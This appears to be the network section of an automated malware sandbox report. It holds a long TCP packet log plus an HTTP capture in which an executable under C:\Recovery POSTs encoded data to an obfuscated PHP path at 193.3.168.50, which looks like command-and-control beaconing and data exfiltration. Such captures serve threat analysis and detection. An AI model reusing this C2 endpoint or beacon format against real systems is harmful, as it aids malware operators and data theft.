Dec 4, 2024 15:46:54.317529917 CET	80	49926	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:55.104188919 CET	80	49926	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:55.149540901 CET	49926	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:55.336719036 CET	80	49926	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:55.383794069 CET	49926	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:55.484846115 CET	49926	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:55.485786915 CET	49930	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:55.604978085 CET	80	49926	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:55.605041981 CET	49926	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:55.605510950 CET	80	49930	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:55.605612040 CET	49930	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:55.605782986 CET	49930	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:55.725696087 CET	80	49930	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:55.962055922 CET	49930	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:56.081882954 CET	80	49930	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:56.859836102 CET	80	49930	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:56.915235043 CET	49930	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:57.096868038 CET	80	49930	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:57.151264906 CET	49930	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:57.281949997 CET	49930	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:57.282501936 CET	49935	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:57.402054071 CET	80	49930	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:57.402157068 CET	49930	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:57.402172089 CET	80	49935	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:57.402261019 CET	49935	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:57.402442932 CET	49935	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:57.522164106 CET	80	49935	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:57.583374977 CET	49937	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:57.703116894 CET	80	49937	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:57.703241110 CET	49937	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:57.703408003 CET	49937	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:57.758950949 CET	49935	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:57.823194981 CET	80	49937	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:57.878746033 CET	80	49935	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:58.056073904 CET	49937	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:58.176136971 CET	80	49937	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:58.176168919 CET	80	49937	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:58.724240065 CET	80	49935	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:58.774455070 CET	49935	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:59.009778976 CET	80	49935	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:59.055675983 CET	49935	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:59.058366060 CET	80	49937	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:59.102564096 CET	49937	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:59.296904087 CET	80	49937	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:59.352586031 CET	49937	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:59.797806025 CET	49935	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:59.815635920 CET	49937	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:59.916433096 CET	49943	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:59.931149960 CET	80	49935	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:59.931227922 CET	49935	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:59.935750961 CET	80	49937	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:59.935827971 CET	49937	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:00.036344051 CET	80	49943	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:00.036465883 CET	49943	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:00.036689997 CET	49943	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:00.156961918 CET	80	49943	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:00.386781931 CET	49943	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:00.506592035 CET	80	49943	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:01.274624109 CET	80	49943	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:01.399456978 CET	49943	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:01.509145975 CET	80	49943	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:01.635723114 CET	49943	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:01.636364937 CET	49946	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:01.756072998 CET	80	49943	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:01.756148100 CET	49943	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:01.756156921 CET	80	49946	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:01.756256104 CET	49946	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:01.769382954 CET	49946	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:01.889122009 CET	80	49946	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:02.242310047 CET	49946	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:02.362128019 CET	80	49946	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:02.995022058 CET	80	49946	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:03.213239908 CET	49946	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:03.233683109 CET	80	49946	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:03.352427959 CET	49946	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:03.353208065 CET	49952	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:03.472677946 CET	80	49946	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:03.472748995 CET	49946	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:03.473295927 CET	80	49952	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:03.473371029 CET	49952	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:03.473543882 CET	49952	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:03.593259096 CET	80	49952	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:03.821418047 CET	49952	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:03.943243027 CET	80	49952	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:04.434304953 CET	49953	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:04.554130077 CET	80	49953	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:04.554961920 CET	49953	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:04.555078983 CET	49953	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:04.674823046 CET	80	49953	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:04.978110075 CET	80	49952	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:05.211896896 CET	49952	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:05.213659048 CET	80	49952	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:05.252882957 CET	49953	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:05.372801065 CET	80	49953	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:05.372920036 CET	80	49953	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:05.399909019 CET	49952	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:05.547101974 CET	49952	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:05.547383070 CET	49959	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:05.667469978 CET	80	49959	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:05.667583942 CET	49959	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:05.667756081 CET	49959	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:05.667784929 CET	80	49952	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:05.667854071 CET	49952	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:05.787786961 CET	80	49959	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:05.829642057 CET	80	49953	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:05.899420977 CET	49953	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:06.024686098 CET	49959	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:06.064789057 CET	80	49953	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:06.144496918 CET	80	49959	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:06.176011086 CET	49953	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:06.937036991 CET	80	49959	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:07.008905888 CET	49959	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:07.156864882 CET	80	49959	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:07.211899996 CET	49959	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:07.307089090 CET	49953	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:07.307198048 CET	49959	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:07.307516098 CET	49963	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:07.427329063 CET	80	49953	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:07.427347898 CET	80	49963	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:07.427412987 CET	49953	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:07.427444935 CET	49963	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:07.427767038 CET	80	49959	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:07.427830935 CET	49959	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:07.505373001 CET	49963	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:07.625160933 CET	80	49963	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:08.170727015 CET	49963	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:08.290713072 CET	80	49963	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:08.687726021 CET	80	49963	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:08.915026903 CET	49963	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:08.930723906 CET	80	49963	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:09.073971987 CET	49963	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:09.074255943 CET	49969	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:09.193932056 CET	80	49969	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:09.193973064 CET	80	49963	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:09.194087029 CET	49963	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:09.194298029 CET	49969	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:09.194298029 CET	49969	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:09.313965082 CET	80	49969	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:09.540318012 CET	49969	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:09.660146952 CET	80	49969	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:10.432779074 CET	80	49969	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:10.508789062 CET	49969	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:10.668953896 CET	80	49969	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:10.805687904 CET	49969	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:11.569806099 CET	49969	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:11.589622021 CET	49975	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:11.690577030 CET	80	49969	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:11.690707922 CET	49969	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:11.709333897 CET	80	49975	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:11.709445000 CET	49975	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:11.727811098 CET	49975	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:11.847589016 CET	80	49975	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:11.895977974 CET	49976	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:12.015857935 CET	80	49976	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:12.015929937 CET	49976	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:12.016124010 CET	49976	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:12.087038040 CET	49975	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:12.135833025 CET	80	49976	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:12.207035065 CET	80	49975	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:12.207087040 CET	80	49975	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:12.381423950 CET	49976	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:12.501286030 CET	80	49976	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:12.946681976 CET	80	49975	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:13.008804083 CET	49975	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:13.184583902 CET	80	49975	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:13.272970915 CET	80	49976	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:13.399421930 CET	49976	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:13.415035009 CET	49975	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:13.508744955 CET	80	49976	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:13.636446953 CET	49975	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:13.636521101 CET	49976	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:13.637212992 CET	49982	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:13.756937981 CET	80	49982	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:13.757044077 CET	80	49975	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:13.757080078 CET	49982	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:13.757100105 CET	49975	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:13.757119894 CET	80	49976	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:13.757199049 CET	49976	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:13.757244110 CET	49982	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:13.876967907 CET	80	49982	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:14.102680922 CET	49982	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:14.222527027 CET	80	49982	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:15.103055954 CET	80	49982	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:15.211982965 CET	49982	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:15.340948105 CET	80	49982	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:15.399435997 CET	49982	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:16.337181091 CET	49982	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:16.342238903 CET	49988	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:16.458180904 CET	80	49982	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:16.458281994 CET	49982	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:16.462908030 CET	80	49988	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:16.463373899 CET	49988	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:16.465801954 CET	49988	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:16.585751057 CET	80	49988	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:16.860868931 CET	49988	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:16.980705976 CET	80	49988	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:17.710314989 CET	80	49988	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:17.899410963 CET	49988	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:17.948257923 CET	80	49988	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:18.008899927 CET	49988	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:18.072252035 CET	49988	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:18.072683096 CET	49991	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:18.192480087 CET	80	49988	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:18.192553997 CET	49988	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:18.192656994 CET	80	49991	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:18.192769051 CET	49991	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:18.192924976 CET	49991	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:18.223251104 CET	49992	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:18.312570095 CET	80	49991	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:18.342983961 CET	80	49992	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:18.343069077 CET	49992	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:18.343272924 CET	49992	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:18.465826988 CET	80	49992	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:18.540252924 CET	49991	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:18.660367966 CET	80	49991	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:18.696362019 CET	49992	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:18.816342115 CET	80	49992	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:18.816481113 CET	80	49992	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:19.433363914 CET	80	49991	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:19.508835077 CET	49991	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:19.607208967 CET	80	49992	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:19.668687105 CET	80	49991	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:19.711930990 CET	49992	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:19.795667887 CET	49991	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:19.795953035 CET	49997	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:19.840835094 CET	80	49992	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:19.899405003 CET	49992	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:19.916114092 CET	80	49991	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:19.916145086 CET	80	49997	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:19.916235924 CET	49991	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:19.916279078 CET	49997	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:19.916520119 CET	49997	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:20.036261082 CET	80	49997	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:20.274792910 CET	49997	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:20.409367085 CET	80	49997	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:21.153655052 CET	80	49997	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:21.211987972 CET	49997	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:21.388688087 CET	80	49997	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:21.508430958 CET	49992	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:21.508490086 CET	49997	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:21.508729935 CET	50003	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:21.628618956 CET	80	50003	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:21.628851891 CET	80	49992	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:21.628849983 CET	50003	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:21.628906965 CET	49992	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:21.628962994 CET	50003	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:21.629422903 CET	80	49997	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:21.629478931 CET	49997	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:21.748675108 CET	80	50003	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:21.978339911 CET	50003	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:22.098567963 CET	80	50003	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:22.868840933 CET	80	50003	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:23.008805037 CET	50003	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:23.104850054 CET	80	50003	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:23.211911917 CET	50003	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:23.230284929 CET	50003	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:23.233683109 CET	50008	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:23.351145983 CET	80	50003	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:23.352679968 CET	50003	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:23.353579998 CET	80	50008	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:23.353693962 CET	50008	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:23.353916883 CET	50008	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:23.473998070 CET	80	50008	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:23.711997032 CET	50008	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:23.831886053 CET	80	50008	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:24.622600079 CET	80	50008	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:24.711926937 CET	50008	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:24.853642941 CET	50010	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:24.863399029 CET	80	50008	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:24.973467112 CET	80	50010	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:24.973582983 CET	50010	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:24.973751068 CET	50010	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:24.992399931 CET	50008	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:24.992650986 CET	50011	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:25.093970060 CET	80	50010	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:25.112443924 CET	80	50011	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:25.112585068 CET	50011	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:25.112726927 CET	50011	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:25.112871885 CET	80	50008	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:25.112927914 CET	50008	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:25.232439995 CET	80	50011	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:25.321384907 CET	50010	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:25.441399097 CET	80	50010	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:25.441446066 CET	80	50010	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:25.461971045 CET	50011	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:25.581844091 CET	80	50011	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:26.384624004 CET	80	50010	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:26.602556944 CET	50010	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:26.645378113 CET	80	50011	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:26.659352064 CET	80	50010	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:26.696289062 CET	50011	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:26.711878061 CET	50010	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:26.901715040 CET	80	50011	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:26.946270943 CET	50011	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:27.034311056 CET	50010	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:27.034415960 CET	50011	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:27.034789085 CET	50017	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:27.154625893 CET	80	50010	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:27.154654980 CET	80	50017	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:27.154684067 CET	50010	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:27.154743910 CET	50017	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:27.154944897 CET	50017	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:27.155383110 CET	80	50011	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:27.155425072 CET	50011	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:27.274761915 CET	80	50017	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:27.510179043 CET	50017	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:27.630068064 CET	80	50017	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:28.424959898 CET	80	50017	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:28.477552891 CET	50017	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:47:28.660636902 CET	80	50017	193.3.168.50	192.168.2.5
Dec 4, 2024 15:47:28.711935043 CET	50017	80	192.168.2.5	193.3.168.50

HTTP Request Dependency Graph

193.3.168.50

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49741	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:45:49.593110085 CET	387	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 4, 2024 15:45:49.990766048 CET	344	OUT	Data Raw: 00 05 04 07 06 08 01 04 05 06 02 01 02 0d 01 0a 00 07 05 08 02 00 03 00 07 06 0a 05 04 05 02 07 0d 04 05 0a 02 57 03 07 0c 51 04 03 00 0a 07 0e 06 53 0c 0b 0d 52 05 06 06 57 04 0c 01 0a 07 0b 02 53 0d 09 05 01 05 51 0c 01 0d 06 0d 02 0c 51 05 06 Data Ascii: WQSRWSQQTR\L~kpP`\_b[wTkoyOtU\\|yogo`e_}~cR`dt}O~V@zmfA~rW
Dec 4, 2024 15:45:50.859899044 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:45:50.875113964 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:45:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 35 36 63 0d 0a 56 4a 7e 01 6f 6e 60 58 6f 5c 70 03 7f 61 7b 07 69 77 6c 52 7e 60 6a 53 6e 70 63 58 69 5b 64 49 60 4d 54 55 7a 5f 7e 5a 75 48 7c 07 7c 71 78 01 55 4b 72 50 74 4c 67 02 6b 5c 6a 5e 7c 49 5f 51 78 66 70 41 7d 05 7f 03 75 04 69 4c 63 58 76 5a 68 07 62 03 6a 6c 5e 4e 7f 64 60 59 77 76 7b 06 7c 5b 69 03 7d 5e 72 5b 78 77 7b 59 7b 67 70 01 6c 7e 7c 5c 79 61 7f 5d 6c 60 71 5f 68 73 7f 5b 7b 67 60 02 6a 5c 51 40 75 07 78 03 7a 51 41 5b 7c 67 6b 55 68 61 7a 54 62 55 6f 5e 7b 55 78 48 74 4e 75 54 6e 71 6e 59 7e 7c 71 5d 6f 61 66 00 77 73 52 5e 75 61 6c 04 60 07 7a 50 7e 5d 79 5f 60 5b 7d 